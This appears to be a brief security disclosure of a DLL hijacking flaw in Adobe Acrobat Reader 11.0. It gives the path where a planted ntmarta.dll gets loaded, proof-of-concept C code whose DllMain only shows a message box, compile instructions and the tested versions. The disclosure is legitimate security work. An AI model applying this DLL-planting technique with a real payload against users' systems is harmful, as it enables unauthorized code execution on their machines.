C:\Program Files\Adobe\Reader 11.0\Reader\ntmarta.dll
which will be loaded by Adobe Acrobat Reader.
PoC Code part of ntmarta.dll
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
MessageBox(NULL, L"DLL Injection by Disects!", L"Developed by Praveen Darshanam",
MB_ICONWARNING|MB_CANCELTRYCONTINUE|MB_DEFBUTTON2);
}
Compile the above code into a Dynamic Loadable Library (DLL).
Tested on
Acrobat Reader 11.0.10
Windows 7 Ultimate N SP1
Refer
http://blog.disects.com/2014/08/dll-injection-executing-and-testing-dlls.html
http://blog.disects.com/2015/02/google-chrome-insecure-dll-loading-code.html
